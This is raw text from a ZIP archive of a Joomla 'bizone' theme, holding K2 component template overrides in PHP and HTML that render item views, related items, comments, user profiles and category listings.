		</div>
		<div class="clr"></div>
	</div>
	<?php endif; ?>

	<?php if($this->item->params->get('itemAuthorLatest') && empty($this->item->created_by_alias) && isset($this->authorLatestItems)): ?>
	<!-- Latest items from author -->
	<div class="itemAuthorLatest">
		<h3><?php echo JText::_('K2_LATEST_FROM'); ?> <?php echo $this->item->author->name; ?></h3>
		<ul>
			<?php foreach($this->authorLatestItems as $key=>$item): ?>
			<li class="<?php echo ($key%2) ? "odd" : "even"; ?>">
				<a href="<?php echo $item->link ?>"><?php echo $item->title; ?></a>
			</li>
			<?php endforeach; ?>
		</ul>
		<div class="clr"></div>
	</div>
	<?php endif; ?>

	<?php
	/*
	A note regarding 'Related Items'...
	If you add:
	- the CSS rule 'overflow-x:scroll;' in the element div.itemRelated {…} in the k2.css
	- the class 'k2Scroller' to the ul element below
	- the classes 'k2ScrollerElement' and 'k2EqualHeights' to the li element inside the foreach loop below
	- the style attribute 'style="width:<?php echo $item->imageWidth; ?>px;"' to the li element inside the foreach loop below
	...then your Related Items will be transformed into a vertical-scrolling block, inside which, all items have the same height (equal column heights). This can be very useful if you want to show your related articles or products with title/author/category/image etc., which would take a significant amount of space in the classic list-style display.
	*/
	?>

	<?php if($this->item->params->get('itemRelated') && isset($this->relatedItems)): ?>
	<!-- Related items by tag -->
	<div class="itemRelated">
		<h3><?php echo JText::_("K2_RELATED_ITEMS_BY_TAG"); ?></h3>
		<ul>
			<?php foreach($this->relatedItems as $key=>$item): ?>
			<li class="<?php echo ($key%2) ? "odd" : "even"; ?>">

				<?php if($this->item->params->get('itemRelatedTitle', 1)): ?>
				<a class="itemRelTitle" href="<?php echo $item->link ?>"><?php echo $item->title; ?></a>
				<?php endif; ?>

				<?php if($this->item->params->get('itemRelatedCategory')): ?>
				<div class="itemRelCat"><?php echo JText::_("K2_IN"); ?> <a href="<?php echo $item->category->link ?>"><?php echo $item->category->name; ?></a></div>
				<?php endif; ?>

				<?php if($this->item->params->get('itemRelatedAuthor')): ?>
				<div class="itemRelAuthor"><?php echo JText::_("K2_BY"); ?> <a rel="author" href="<?php echo $item->author->link; ?>"><?php echo $item->author->name; ?></a></div>
				<?php endif; ?>

				<?php if($this->item->params->get('itemRelatedImageSize')): ?>
				<img style="width:<?php echo $item->imageWidth; ?>px;height:auto;" class="itemRelImg" src="<?php echo $item->image; ?>" alt="<?php echo K2HelperUtilities::cleanHtml($item->title); ?>" />
				<?php endif; ?>

				<?php if($this->item->params->get('itemRelatedIntrotext')): ?>
				<div class="itemRelIntrotext"><?php echo $item->introtext; ?></div>
				<?php endif; ?>

				<?php if($this->item->params->get('itemRelatedFulltext')): ?>
				<div class="itemRelFulltext"><?php echo $item->fulltext; ?></div>
				<?php endif; ?>

				<?php if($this->item->params->get('itemRelatedMedia')): ?>
				<?php if($item->videoType=='embedded'): ?>
				<div class="itemRelMediaEmbedded"><?php echo $item->video; ?></div>
				<?php else: ?>
				<div class="itemRelMedia"><?php echo $item->video; ?></div>
				<?php endif; ?>
				<?php endif; ?>

				<?php if($this->item->params->get('itemRelatedImageGallery')): ?>
				<div class="itemRelImageGallery"><?php echo $item->gallery; ?></div>
				<?php endif; ?>
			</li>
			<?php endforeach; ?>
			<li class="clr"></li>
		</ul>
		<div class="clr"></div>
	</div>
	<?php endif; ?>

	<div class="clr"></div>

	<?php if($this->item->params->get('itemVideo') && !empty($this->item->video)): ?>
	<!-- Item video -->
	<a name="itemVideoAnchor" id="itemVideoAnchor"></a>
	<div class="itemVideoBlock">
		<h3><?php echo JText::_('K2_MEDIA'); ?></h3>

		<?php if($this->item->videoType=='embedded'): ?>
		<div class="itemVideoEmbedded">
			<?php echo $this->item->video; ?>
		</div>
		<?php else: ?>
		<span class="itemVideo"><?php echo $this->item->video; ?></span>
		<?php endif; ?>

		<?php if($this->item->params->get('itemVideoCaption') && !empty($this->item->video_caption)): ?>
		<span class="itemVideoCaption"><?php echo $this->item->video_caption; ?></span>
		<?php endif; ?>

		<?php if($this->item->params->get('itemVideoCredits') && !empty($this->item->video_credits)): ?>
		<span class="itemVideoCredits"><?php echo $this->item->video_credits; ?></span>
		<?php endif; ?>

		<div class="clr"></div>
	</div>
	<?php endif; ?>

	<?php if($this->item->params->get('itemImageGallery') && !empty($this->item->gallery)): ?>
	<!-- Item image gallery -->
	<a name="itemImageGalleryAnchor" id="itemImageGalleryAnchor"></a>
	<div class="itemImageGallery">
		<h3><?php echo JText::_('K2_IMAGE_GALLERY'); ?></h3>
		<?php echo $this->item->gallery; ?>
	</div>
	<?php endif; ?>

	<?php if($this->item->params->get('itemNavigation') && !JRequest::getCmd('print') && (isset($this->item->nextLink) || isset($this->item->previousLink))): ?>
	<!-- Item navigation -->
	<div class="itemNavigation">
		<span class="itemNavigationTitle"><?php echo JText::_('K2_MORE_IN_THIS_CATEGORY'); ?></span>

		<?php if(isset($this->item->previousLink)): ?>
		<a class="itemPrevious" href="<?php echo $this->item->previousLink; ?>">&laquo; <?php echo $this->item->previousTitle; ?></a>
		<?php endif; ?>

		<?php if(isset($this->item->nextLink)): ?>
		<a class="itemNext" href="<?php echo $this->item->nextLink; ?>"><?php echo $this->item->nextTitle; ?> &raquo;</a>
		<?php endif; ?>
	</div>
	<?php endif; ?>

	<!-- Plugins: AfterDisplay -->
	<?php echo $this->item->event->AfterDisplay; ?>

	<!-- K2 Plugins: K2AfterDisplay -->
	<?php echo $this->item->event->K2AfterDisplay; ?>

	<?php if(
        $this->item->params->get('itemComments') &&
        (($this->item->params->get('comments') == '2' && !$this->user->guest) || ($this->item->params->get('comments') == '1'))
    ): ?>
    <!-- K2 Plugins: K2CommentsBlock -->
    <?php echo $this->item->event->K2CommentsBlock; ?>
    <?php endif; ?>

    <?php if(
        $this->item->params->get('itemComments') &&
        ($this->item->params->get('comments') == '1' || ($this->item->params->get('comments') == '2')) && empty($this->item->event->K2CommentsBlock)
    ): ?>
    <!-- Item comments -->
    <a name="itemCommentsAnchor" id="itemCommentsAnchor"></a>
    <div class="itemComments">
        <?php if($this->item->params->get('commentsFormPosition')=='above' && $this->item->params->get('itemComments') && !JRequest::getInt('print') && ($this->item->params->get('comments') == '1' || ($this->item->params->get('comments') == '2' && K2HelperPermissions::canAddComment($this->item->catid)))): ?>
        <!-- Item comments form -->
        <div class="itemCommentsForm">
            <?php echo $this->loadTemplate('comments_form'); ?>
        </div>
        <?php endif; ?>

        <?php if($this->item->numOfComments>0 && $this->item->params->get('itemComments') && ($this->item->params->get('comments') == '1' || ($this->item->params->get('comments') == '2'))): ?>
        <!-- Item user comments -->
        <h3 class="itemCommentsCounter">
            <span><?php echo $this->item->numOfComments; ?></span> <?php echo ($this->item->numOfComments>1) ? JText::_('K2_COMMENTS') : JText::_('K2_COMMENT'); ?>
        </h3>

        <div class="itemCommentsList">
            <?php foreach ($this->item->comments as $key=>$comment): ?>                            
            <div class="media blog-reply"> 
                <?php if($comment->userImage): ?>
                <div class="pull-left"> 
                    <img src="<?php echo JUri::root(); ?>images/default.gif" alt="Bianca Reid" width="74" height="74" /> 
                </div>
                <?php endif; ?>
                <div class="media-body">
                    <h4><?php echo $comment->userName; ?></h4>
                    <p><?php echo $comment->commentText; ?></p>
                    <a href="<?php echo $this->item->link; ?>#comment<?php echo $comment->id; ?>" class="btn-rep" name="comment<?php echo $comment->id; ?>" id="comment<?php echo $comment->id; ?>">
                        <?php echo JText::_('K2_COMMENT_LINK'); ?>
                    </a> 
                </div>

                <?php if(
                    $this->inlineCommentsModeration ||
                    ($comment->published && ($this->params->get('commentsReporting')=='1' || ($this->params->get('commentsReporting')=='2' && !$this->user->guest)))
                ): ?>
                <span class="commentToolbar">
                    <?php if($this->inlineCommentsModeration): ?>
                    <?php if(!$comment->published): ?>
                    <a class="commentApproveLink" href="<?php echo JRoute::_('index.php?option=com_k2&view=comments&task=publish&commentID='.$comment->id.'&format=raw')?>"><?php echo JText::_('K2_APPROVE')?></a>
                    <?php endif; ?>

                    <a class="commentRemoveLink" href="<?php echo JRoute::_('index.php?option=com_k2&view=comments&task=remove&commentID='.$comment->id.'&format=raw')?>"><?php echo JText::_('K2_REMOVE')?></a>
                    <?php endif; ?>

                    <?php if($comment->published && ($this->params->get('commentsReporting')=='1' || ($this->params->get('commentsReporting')=='2' && !$this->user->guest))): ?>
                    <a data-k2-modal="iframe" href="<?php echo JRoute::_('index.php?option=com_k2&view=comments&task=report&commentID='.$comment->id)?>"><?php echo JText::_('K2_REPORT')?></a>
                    <?php endif; ?>

                    <?php if($comment->reportUserLink): ?>
                    <a class="k2ReportUserButton" href="<?php echo $comment->reportUserLink; ?>"><?php echo JText::_('K2_FLAG_AS_SPAMMER'); ?></a>
                    <?php endif; ?>
                </span>
                <?php endif; ?>
            </div>
            <?php endforeach; ?>
        </div>

        <!-- Comments Pagination -->
        <div class="itemCommentsPagination">
            <?php echo $this->pagination->getPagesLinks(); ?>
            <div class="clr"></div>
        </div>
        <?php endif; ?>

        <?php if(
            $this->item->params->get('commentsFormPosition')=='below' &&
            $this->item->params->get('itemComments') &&
            !JRequest::getInt('print') &&
            ($this->item->params->get('comments') == '1' || ($this->item->params->get('comments') == '2' && K2HelperPermissions::canAddComment($this->item->catid)))
        ): ?>
        <!-- Item comments form -->
        <div class="itemCommentsForm">
            <?php echo $this->loadTemplate('comments_form'); ?>
        </div>
        <?php endif; ?>

        <?php $user = JFactory::getUser(); if($this->item->params->get('comments') == '2' && $user->guest): ?>
        <div class="itemCommentsLoginFirst"><?php echo JText::_('K2_LOGIN_TO_POST_COMMENTS'); ?></div>
        <?php endif; ?>

    </div>
    <?php endif; ?>

	<?php if(!JRequest::getCmd('print')): ?>
	<div class="itemBackToTop">
		<a class="k2Anchor" href="<?php echo $this->item->link; ?>#startOfPageId<?php echo JRequest::getInt('id'); ?>">
			<?php echo JText::_('K2_BACK_TO_TOP'); ?>
		</a>
	</div>
	<?php endif; ?>

	<div class="clr"></div>

</div>
<!-- End K2 Item Layout -->
PK!\X[�((6bizone/html/com_k2/templates/default/category_item.phpnu&1i�<?php
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

// Define default image size (do not change)
K2HelperUtilities::setDefaultImage($this->item, 'itemlist', $this->params);

?>

<!-- Start K2 Item Layout -->
<div class="blog-item-v3 catItemView group<?php echo ucfirst($this->item->itemGroup); ?><?php echo ($this->item->featured) ? ' catItemIsFeatured' : ''; ?><?php if($this->item->params->get('pageclass_sfx')) echo ' '.$this->item->params->get('pageclass_sfx'); ?>">

	<!-- Plugins: BeforeDisplay -->
	<?php echo $this->item->event->BeforeDisplay; ?>

	<!-- K2 Plugins: K2BeforeDisplay -->
	<?php echo $this->item->event->K2BeforeDisplay; ?>

	<?php if($this->item->params->get('catItemImage') && !empty($this->item->image)): ?>
	<!-- Item Image -->
	<div class="catItemImageBlock">
	  <span class="catItemImage">
	    <a href="<?php echo $this->item->link; ?>" title="<?php if(!empty($this->item->image_caption)) echo K2HelperUtilities::cleanHtml($this->item->image_caption); else echo K2HelperUtilities::cleanHtml($this->item->title); ?>">
	    	<img src="<?php echo $this->item->image; ?>" alt="<?php if(!empty($this->item->image_caption)) echo K2HelperUtilities::cleanHtml($this->item->image_caption); else echo K2HelperUtilities::cleanHtml($this->item->title); ?>" style="width:<?php echo $this->item->imageWidth; ?>px; height:auto;" />
	    </a>
	  </span>
	  <div class="clr"></div>
	</div>
	<?php endif; ?>

	<div class="blog-content catItemHeader">
		<?php if($this->item->params->get('catItemTitle')): ?>
			<?php if ($this->item->params->get('catItemTitleLinked')): ?>
				<h3><a href="<?php echo $this->item->link; ?>"><?php echo $this->item->title; ?></a></h3>
			<?php else: ?>
				<h3><?php echo $this->item->title; ?></h3>
			<?php endif; ?>
		<?php endif; ?>
        <ul class="blog-author">
            <?php if($this->item->params->get('itemAuthor')): ?>
            <li><a href="<?php echo $this->item->link; ?>"><i class="fa fa-user"></i><?php echo $this->item->author->name; ?></a></li>
            <?php endif; ?>
            <?php if($this->item->params->get('itemCommentsAnchor') && $this->item->params->get('itemComments') && ( ($this->item->params->get('comments') == '2' && !$this->user->guest) || ($this->item->params->get('comments') == '1')) ): ?>
            <li><a href="<?php echo $this->item->link; ?>"><i class="fa fa-comment-o"></i><?php echo $this->item->numOfComments; ?> <?php echo JText::_('K2_COMMENTS'); ?></a></li>
            <?php endif; ?>
            <?php if($this->item->params->get('itemDateCreated')): 
                $date = new DateTime($this->item->created);
            ?>
            <li><a href="<?php echo $this->item->link; ?>"><i class="fa fa-clock-o"></i><?php echo $date->format('m F, Y'); ?></a></li>
            <?php endif; ?>
        </ul>
  	</div>

  <!-- Plugins: AfterDisplayTitle -->
  <?php echo $this->item->event->AfterDisplayTitle; ?>

  <!-- K2 Plugins: K2AfterDisplayTitle -->
  <?php echo $this->item->event->K2AfterDisplayTitle; ?>

	<?php if($this->item->params->get('catItemRating')): ?>
	<!-- Item Rating -->
	<div class="catItemRatingBlock">
		<span><?php echo JText::_('K2_RATE_THIS_ITEM'); ?></span>
		<div class="itemRatingForm">
			<ul class="itemRatingList">
				<li class="itemCurrentRating" id="itemCurrentRating<?php echo $this->item->id; ?>" style="width:<?php echo $this->item->votingPercentage; ?>%;"></li>
				<li><a href="#" data-id="<?php echo $this->item->id; ?>" title="<?php echo JText::_('K2_1_STAR_OUT_OF_5'); ?>" class="one-star">1</a></li>
				<li><a href="#" data-id="<?php echo $this->item->id; ?>" title="<?php echo JText::_('K2_2_STARS_OUT_OF_5'); ?>" class="two-stars">2</a></li>
				<li><a href="#" data-id="<?php echo $this->item->id; ?>" title="<?php echo JText::_('K2_3_STARS_OUT_OF_5'); ?>" class="three-stars">3</a></li>
				<li><a href="#" data-id="<?php echo $this->item->id; ?>" title="<?php echo JText::_('K2_4_STARS_OUT_OF_5'); ?>" class="four-stars">4</a></li>
				<li><a href="#" data-id="<?php echo $this->item->id; ?>" title="<?php echo JText::_('K2_5_STARS_OUT_OF_5'); ?>" class="five-stars">5</a></li>
			</ul>
			<div id="itemRatingLog<?php echo $this->item->id; ?>" class="itemRatingLog"><?php echo $this->item->numOfvotes; ?></div>
			<div class="clr"></div>
		</div>
		<div class="clr"></div>
	</div>
	<?php endif; ?>

  <div class="blog-content catItemBody" style="padding: 0;">

	  <!-- Plugins: BeforeDisplayContent -->
	  <?php echo $this->item->event->BeforeDisplayContent; ?>

	  <!-- K2 Plugins: K2BeforeDisplayContent -->
	  <?php echo $this->item->event->K2BeforeDisplayContent; ?>

	  <?php if($this->item->params->get('catItemIntroText')): ?>
	  <!-- Item introtext -->
	  <div class="catItemIntroText">
	  	<?php echo $this->item->introtext; ?>
	  </div>
	  <?php endif; ?>

		<div class="clr"></div>

	  <?php if($this->item->params->get('catItemExtraFields') && count($this->item->extra_fields)): ?>
	  <!-- Item extra fields -->
	  <div class="catItemExtraFields">
	  	<h4><?php echo JText::_('K2_ADDITIONAL_INFO'); ?></h4>
	  	<ul>
			<?php foreach ($this->item->extra_fields as $key=>$extraField): ?>
			<?php if($extraField->value != ''): ?>
			<li class="<?php echo ($key%2) ? "odd" : "even"; ?> type<?php echo ucfirst($extraField->type); ?> group<?php echo $extraField->group; ?>">
				<?php if($extraField->type == 'header'): ?>
				<h4 class="catItemExtraFieldsHeader"><?php echo $extraField->name; ?></h4>
				<?php else: ?>
				<span class="catItemExtraFieldsLabel"><?php echo $extraField->name; ?></span>
				<span class="catItemExtraFieldsValue"><?php echo $extraField->value; ?></span>
				<?php endif; ?>
			</li>
			<?php endif; ?>
			<?php endforeach; ?>
			</ul>
	    <div class="clr"></div>
	  </div>
	  <?php endif; ?>

	  <!-- Plugins: AfterDisplayContent -->
	  <?php echo $this->item->event->AfterDisplayContent; ?>

	  <!-- K2 Plugins: K2AfterDisplayContent -->
	  <?php echo $this->item->event->K2AfterDisplayContent; ?>

	  <div class="clr"></div>
  </div>

  <?php if(
  $this->item->params->get('catItemHits') ||
  $this->item->params->get('catItemCategory') ||
  $this->item->params->get('catItemTags') ||
  $this->item->params->get('catItemAttachments')
  ): ?>
  <div class="catItemLinks">

		<?php if($this->item->params->get('catItemHits')): ?>
		<!-- Item Hits -->
		<div class="catItemHitsBlock">
			<span class="catItemHits">
				<?php echo JText::_('K2_READ'); ?> <b><?php echo $this->item->hits; ?></b> <?php echo JText::_('K2_TIMES'); ?>
			</span>
		</div>
		<?php endif; ?>

		<?php if($this->item->params->get('catItemCategory')): ?>
		<!-- Item category name -->
		<div class="catItemCategory">
			<span><?php echo JText::_('K2_PUBLISHED_IN'); ?></span>
			<a href="<?php echo $this->item->category->link; ?>"><?php echo $this->item->category->name; ?></a>
		</div>
		<?php endif; ?>

	  <?php if($this->item->params->get('catItemTags') && count($this->item->tags)): ?>
	  <!-- Item tags -->
	  <div class="catItemTagsBlock">
		  <span><?php echo JText::_('K2_TAGGED_UNDER'); ?></span>
		  <ul class="catItemTags">
		    <?php foreach ($this->item->tags as $tag): ?>
		    <li><a href="<?php echo $tag->link; ?>"><?php echo $tag->name; ?></a></li>
		    <?php endforeach; ?>
		  </ul>
		  <div class="clr"></div>
	  </div>
	  <?php endif; ?>

	  <?php if($this->item->params->get('catItemAttachments') && count($this->item->attachments)): ?>
	  <!-- Item attachments -->
	  <div class="catItemAttachmentsBlock">
		  <span><?php echo JText::_('K2_DOWNLOAD_ATTACHMENTS'); ?></span>
		  <ul class="catItemAttachments">
		    <?php foreach ($this->item->attachments as $attachment): ?>
		    <li>
			    <a title="<?php echo K2HelperUtilities::cleanHtml($attachment->titleAttribute); ?>" href="<?php echo $attachment->link; ?>">
			    	<?php echo $attachment->title ; ?>
			    </a>
			    <?php if($this->item->params->get('catItemAttachmentsCounter')): ?>
			    <span>(<?php echo $attachment->hits; ?> <?php echo ($attachment->hits==1) ? JText::_('K2_DOWNLOAD') : JText::_('K2_DOWNLOADS'); ?>)</span>
			    <?php endif; ?>
		    </li>
		    <?php endforeach; ?>
		  </ul>
	  </div>
	  <?php endif; ?>

		<div class="clr"></div>
  </div>
  <?php endif; ?>

	<div class="clr"></div>

  <?php if($this->item->params->get('catItemVideo') && !empty($this->item->video)): ?>
  <!-- Item video -->
  <div class="catItemVideoBlock">
  	<h3><?php echo JText::_('K2_RELATED_VIDEO'); ?></h3>
		<?php if($this->item->videoType=='embedded'): ?>
		<div class="catItemVideoEmbedded">
			<?php echo $this->item->video; ?>
		</div>
		<?php else: ?>
		<span class="catItemVideo"><?php echo $this->item->video; ?></span>
		<?php endif; ?>
  </div>
  <?php endif; ?>

  <?php if($this->item->params->get('catItemImageGallery') && !empty($this->item->gallery)): ?>
  <!-- Item image gallery -->
  <div class="catItemImageGallery">
	  <h4><?php echo JText::_('K2_IMAGE_GALLERY'); ?></h4>
	  <?php echo $this->item->gallery; ?>
  </div>
  <?php endif; ?>

  <div class="clr"></div>

	<?php if ($this->item->params->get('catItemReadMore')): ?>
	<!-- Item "read more..." link -->
	<div class="catItemReadMore">
		<a class="btn-common btn-green bounce-top" href="<?php echo $this->item->link; ?>"><?php echo JText::_('K2_READ_MORE'); ?></a>
	</div>
	<?php endif; ?>

	<div class="clr"></div>

	<?php if($this->item->params->get('catItemDateModified')): ?>
	<!-- Item date modified -->
	<?php if($this->item->modified != $this->nullDate && $this->item->modified != $this->item->created ): ?>
	<span class="catItemDateModified">
		<?php echo JText::_('K2_LAST_MODIFIED_ON'); ?> <?php echo JHTML::_('date', $this->item->modified, JText::_('K2_DATE_FORMAT_LC2')); ?>
	</span>
	<?php endif; ?>
	<?php endif; ?>

  <!-- Plugins: AfterDisplay -->
  <?php echo $this->item->event->AfterDisplay; ?>

  <!-- K2 Plugins: K2AfterDisplay -->
  <?php echo $this->item->event->K2AfterDisplay; ?>

	<div class="clr"></div>
</div>
<!-- End K2 Item Layout -->
PK!C�b%b%-bizone/html/com_k2/templates/default/user.phpnu&1i�<?php
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

// Get user stuff (do not change)
$user = JFactory::getUser();

?>

<!-- Start K2 User Layout -->

<div id="k2Container" class="userView<?php if($this->params->get('pageclass_sfx')) echo ' '.$this->params->get('pageclass_sfx'); ?>">

	<?php if($this->params->get('show_page_title') && $this->params->get('page_title')!=$this->user->name): ?>
	<!-- Page title -->
	<div class="componentheading<?php echo $this->params->get('pageclass_sfx')?>">
		<?php echo $this->escape($this->params->get('page_title')); ?>
	</div>
	<?php endif; ?>

	<?php if($this->params->get('userFeedIcon',1)): ?>
	<!-- RSS feed icon -->
	<div class="k2FeedIcon">
		<a href="<?php echo $this->feed; ?>" title="<?php echo JText::_('K2_SUBSCRIBE_TO_THIS_RSS_FEED'); ?>">
			<span><?php echo JText::_('K2_SUBSCRIBE_TO_THIS_RSS_FEED'); ?></span>
		</a>
		<div class="clr"></div>
	</div>
	<?php endif; ?>

	<?php if ($this->params->get('userImage') || $this->params->get('userName') || $this->params->get('userDescription') || $this->params->get('userURL') || $this->params->get('userEmail')): ?>
	<div class="userBlock">

		<?php if(isset($this->addLink) && JRequest::getInt('id')==$user->id): ?>
		<!-- Item add link -->
		<span class="userItemAddLink">
			<a data-k2-modal="edit" href="<?php echo $this->addLink; ?>">
				<?php echo JText::_('K2_POST_A_NEW_ITEM'); ?>
			</a>
		</span>
		<?php endif; ?>

		<?php if ($this->params->get('userImage') && !empty($this->user->avatar)): ?>
		<img src="<?php echo $this->user->avatar; ?>" alt="<?php echo htmlspecialchars($this->user->name, ENT_QUOTES, 'UTF-8'); ?>" style="width:<?php echo $this->params->get('userImageWidth'); ?>px; height:auto;" />
		<?php endif; ?>

		<?php if ($this->params->get('userName')): ?>
		<h2><?php echo $this->user->name; ?></h2>
		<?php endif; ?>

		<?php if ($this->params->get('userDescription') && trim($this->user->profile->description)): ?>
		<div class="userDescription"><?php echo $this->user->profile->description; ?></div>
		<?php endif; ?>

		<?php if (($this->params->get('userURL') && isset($this->user->profile->url) && $this->user->profile->url) || $this->params->get('userEmail')): ?>
		<div class="userAdditionalInfo">
			<?php if ($this->params->get('userURL') && isset($this->user->profile->url) && $this->user->profile->url): ?>
			<span class="userURL">
				<?php echo JText::_('K2_WEBSITE_URL'); ?>: <a href="<?php echo $this->user->profile->url; ?>" target="_blank" rel="me"><?php echo $this->user->profile->url; ?></a>
			</span>
			<?php endif; ?>

			<?php if ($this->params->get('userEmail')): ?>
			<span class="userEmail">
				<?php echo JText::_('K2_EMAIL'); ?>: <?php echo JHTML::_('Email.cloak', $this->user->email); ?>
			</span>
			<?php endif; ?>
		</div>
		<?php endif; ?>

		<div class="clr"></div>

		<?php echo $this->user->event->K2UserDisplay; ?>

		<div class="clr"></div>
	</div>
	<?php endif; ?>



	<?php if(count($this->items)): ?>
	<!-- Item list -->
	<div class="userItemList">
		<?php foreach ($this->items as $item): ?>

		<!-- Start K2 Item Layout -->
		<div class="userItemView<?php if(!$item->published || ($item->publish_up != $this->nullDate && $item->publish_up > $this->now) || ($item->publish_down != $this->nullDate && $item->publish_down < $this->now)) echo ' userItemViewUnpublished'; ?><?php echo ($item->featured) ? ' userItemIsFeatured' : ''; ?>">

			<!-- Plugins: BeforeDisplay -->
			<?php echo $item->event->BeforeDisplay; ?>

			<!-- K2 Plugins: K2BeforeDisplay -->
			<?php echo $item->event->K2BeforeDisplay; ?>

			<div class="userItemHeader">
				<?php if($this->params->get('userItemDateCreated')): ?>
				<!-- Date created -->
				<span class="userItemDateCreated">
					<?php echo JHTML::_('date', $item->created , JText::_('K2_DATE_FORMAT_LC2')); ?>
				</span>
				<?php endif; ?>

			  <?php if($this->params->get('userItemTitle')): ?>
			  <!-- Item title -->
			  <h3 class="userItemTitle">
					<?php if(isset($item->editLink)): ?>
					<!-- Item edit link -->
					<span class="userItemEditLink">
						<a data-k2-modal="edit" href="<?php echo $item->editLink; ?>">
							<?php echo JText::_('K2_EDIT_ITEM'); ?>
						</a>
					</span>
					<?php endif; ?>

			  	<?php if ($this->params->get('userItemTitleLinked') && $item->published): ?>
					<a href="<?php echo $item->link; ?>">
			  		<?php echo $item->title; ?>
			  	</a>
			  	<?php else: ?>
			  	<?php echo $item->title; ?>
			  	<?php endif; ?>
			  	<?php if(!$item->published || ($item->publish_up != $this->nullDate && $item->publish_up > $this->now) || ($item->publish_down != $this->nullDate && $item->publish_down < $this->now)): ?>
			  	<span>
		  			<sup>
		  				<?php echo JText::_('K2_UNPUBLISHED'); ?>
		  			</sup>
	  			</span>
	  			<?php endif; ?>
			  </h3>
			  <?php endif; ?>
		  </div>

		  <!-- Plugins: AfterDisplayTitle -->
		  <?php echo $item->event->AfterDisplayTitle; ?>

		  <!-- K2 Plugins: K2AfterDisplayTitle -->
		  <?php echo $item->event->K2AfterDisplayTitle; ?>

		  <div class="userItemBody">

			  <!-- Plugins: BeforeDisplayContent -->
			  <?php echo $item->event->BeforeDisplayContent; ?>

			  <!-- K2 Plugins: K2BeforeDisplayContent -->
			  <?php echo $item->event->K2BeforeDisplayContent; ?>

			  <?php if($this->params->get('userItemImage') && !empty($item->imageGeneric)): ?>
			  <!-- Item Image -->
			  <div class="userItemImageBlock">
				  <span class="userItemImage">
				    <a href="<?php echo $item->link; ?>" title="<?php if(!empty($item->image_caption)) echo K2HelperUtilities::cleanHtml($item->image_caption); else echo K2HelperUtilities::cleanHtml($item->title); ?>">
				    	<img src="<?php echo $item->imageGeneric; ?>" alt="<?php if(!empty($item->image_caption)) echo K2HelperUtilities::cleanHtml($item->image_caption); else echo K2HelperUtilities::cleanHtml($item->title); ?>" style="width:<?php echo $this->params->get('itemImageGeneric'); ?>px; height:auto;" />
				    </a>
				  </span>
				  <div class="clr"></div>
			  </div>
			  <?php endif; ?>

			  <?php if($this->params->get('userItemIntroText')): ?>
			  <!-- Item introtext -->
			  <div class="userItemIntroText">
			  	<?php echo $item->introtext; ?>
			  </div>
			  <?php endif; ?>

				<div class="clr"></div>

			  <!-- Plugins: AfterDisplayContent -->
			  <?php echo $item->event->AfterDisplayContent; ?>

			  <!-- K2 Plugins: K2AfterDisplayContent -->
			  <?php echo $item->event->K2AfterDisplayContent; ?>

			  <div class="clr"></div>
		  </div>

		  <?php if($this->params->get('userItemCategory') || $this->params->get('userItemTags')): ?>
		  <div class="userItemLinks">

				<?php if($this->params->get('userItemCategory')): ?>
				<!-- Item category name -->
				<div class="userItemCategory">
					<span><?php echo JText::_('K2_PUBLISHED_IN'); ?></span>
					<a href="<?php echo $item->category->link; ?>"><?php echo $item->category->name; ?></a>
				</div>
				<?php endif; ?>

			  <?php if($this->params->get('userItemTags') && isset($item->tags)): ?>
			  <!-- Item tags -->
			  <div class="userItemTagsBlock">
				  <span><?php echo JText::_('K2_TAGGED_UNDER'); ?></span>
				  <ul class="userItemTags">
				    <?php foreach ($item->tags as $tag): ?>
				    <li><a href="<?php echo $tag->link; ?>"><?php echo $tag->name; ?></a></li>
				    <?php endforeach; ?>
				  </ul>
				  <div class="clr"></div>
			  </div>
			  <?php endif; ?>

				<div class="clr"></div>
		  </div>
		  <?php endif; ?>

			<div class="clr"></div>

			<?php if($this->params->get('userItemCommentsAnchor') && ( ($this->params->get('comments') == '2' && !$this->user->guest) || ($this->params->get('comments') == '1')) ): ?>
			<!-- Anchor link to comments below -->
			<div class="userItemCommentsLink">
				<?php if(!empty($item->event->K2CommentsCounter)): ?>
					<!-- K2 Plugins: K2CommentsCounter -->
					<?php echo $item->event->K2CommentsCounter; ?>
				<?php else: ?>
					<?php if($item->numOfComments > 0): ?>
					<a href="<?php echo $item->link; ?>#itemCommentsAnchor">
						<?php echo $item->numOfComments; ?> <?php echo ($item->numOfComments>1) ? JText::_('K2_COMMENTS') : JText::_('K2_COMMENT'); ?>
					</a>
					<?php else: ?>
					<a href="<?php echo $item->link; ?>#itemCommentsAnchor">
						<?php echo JText::_('K2_BE_THE_FIRST_TO_COMMENT'); ?>
					</a>
					<?php endif; ?>
				<?php endif; ?>
			</div>
			<?php endif; ?>

			<?php if ($this->params->get('userItemReadMore')): ?>
			<!-- Item "read more..." link -->
			<div class="userItemReadMore">
				<a class="k2ReadMore" href="<?php echo $item->link; ?>">
					<?php echo JText::_('K2_READ_MORE'); ?>
				</a>
			</div>
			<?php endif; ?>

			<div class="clr"></div>

		  <!-- Plugins: AfterDisplay -->
		  <?php echo $item->event->AfterDisplay; ?>

		  <!-- K2 Plugins: K2AfterDisplay -->
		  <?php echo $item->event->K2AfterDisplay; ?>

			<div class="clr"></div>
		</div>
		<!-- End K2 Item Layout -->

		<?php endforeach; ?>
	</div>

	<!-- Pagination -->
	<?php if(count($this->pagination->getPagesLinks())): ?>
	<div class="k2Pagination">
		<?php echo $this->pagination->getPagesLinks(); ?>
		<div class="clr"></div>
		<?php echo $this->pagination->getPagesCounter(); ?>
	</div>
	<?php endif; ?>

	<?php endif; ?>

</div>

<!-- End K2 User Layout -->
PK!8XC7}}/bizone/html/com_k2/templates/default/latest.phpnu&1i�<?php
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

?>

<!-- Start K2 Latest Layout -->
